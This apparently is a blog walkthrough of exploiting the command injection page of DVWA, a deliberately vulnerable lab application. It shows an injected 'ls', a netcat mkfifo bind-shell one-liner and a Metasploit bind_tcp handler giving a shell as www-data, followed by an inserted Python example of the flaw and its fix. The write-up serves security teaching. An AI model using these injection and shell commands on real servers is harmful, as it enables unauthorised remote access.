
Exploiting Command Injection vulnerabilities

18 Apr 2017 . category: tech
#redteam #kali #dvwa #metasploit

Command Injection is the manipulation of vulnerable software in order to execute arbitrary commands on the host operating system. Command Injections are possible when the application skips input validation and uses the user-supplied input to build a shell command that it executes on the host operating system. In this post we’ll get our hands on DVWA’s Command Injection section, and we’ll open a backdoor on the server using Metasploit.

Visit the Command Injection section of DVWA.


The page says that it will ping an IP address for us, so let’s see what it will do for the IP


Now, let’s try to append a list bash command after our input IP address:

; ls


Sweet, DVWA simply appends our input to the underlying bash command!

Now, let’s listen on port 4444 using netcat and redirect all the incoming bytes to a bash shell:

; mkfifo /tmp/pipe ; sh /tmp/pipe | nc -l -p 4444 > /tmp/pipe


As you will notice, the page is loading forever, which means that our backdoor is open and waiting for us… 😄

Let’s start msfconsole and open the shell on the server:

use exploit/multi/handler
set payload linux/x64/shell/bind_tcp


Note that we didn’t set the LPORT of bind_tcp, since the default one is 4444.

As you can see, we are the www-data user, and that’s why we can’t read the /etc/shadow file, which contains the user passwords of the operating system. However, we have all the privileges of the www-data user, so we can, for example, modify DVWA or escalate to root by exploiting a local privilege escalation vulnerability.
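The root cause seen in the "; ls" step, and the fix for it, as an added Python example (not DVWA's own code and not from the original post): the first builder appends input to a shell command line, the second accepts only a literal IPv4 address and runs ping without a shell. The function names, the ping count of 4 and the sample address 127.0.0.1 are assumptions made for the illustration.

```python
import ipaddress
import shlex
import subprocess

PING_COUNT = "4"  # assumed option; the post does not show the exact ping flags
CONTROL_OPS = {";", "|", "||", "&", "&&"}


def build_vulnerable(user_input):
    """The flaw: user input appended to a string that a shell will parse."""
    return f"ping -c {PING_COUNT} {user_input}"


def commands_seen_by_shell(cmdline):
    """Approximate how sh splits a line into commands. Nothing is executed."""
    commands, current = [], []
    for token in shlex.shlex(cmdline, posix=True, punctuation_chars=True):
        if token in CONTROL_OPS:
            commands.append(current)
            current = []
        else:
            current.append(token)
    commands.append(current)
    return [c for c in commands if c]


def build_hardened(user_input):
    """Accept only a literal IPv4 address and return an argv list."""
    try:
        addr = ipaddress.IPv4Address(user_input.strip())
    except ValueError:
        raise ValueError(f"not an IPv4 address: {user_input!r}") from None
    return ["ping", "-c", PING_COUNT, str(addr)]


def run_ping(user_input, timeout=10.0):
    """Run ping without a shell: argv goes straight to exec, so ';' is inert."""
    argv = build_hardened(user_input)
    done = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return done.stdout


if __name__ == "__main__":
    sample = "127.0.0.1; ls"  # constructed input, same shape as the post's test
    print(commands_seen_by_shell(build_vulnerable(sample)))
    try:
        build_hardened(sample)
    except ValueError as exc:
        print("rejected:", exc)
```

Validation and shell-free execution are independent layers: either one alone stops the appended command, and keeping both means a later change to one does not reopen the hole.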

Happy binding!


Panos is a Computer Scientist with scientific publications in top conferences and journals, several patent applications, open-source contributions on privacy preserving products and a proven track record of delivering secure, reliable and fast cloud services. In the past, he worked as a Linux kernel developer at the CERN CERT team, did Machine Learning research at the University of Athens and innovated on Microsoft’s Office 365 cloud services. Currently he is on a mission to contribute to the mass adoption of cryptocurrencies.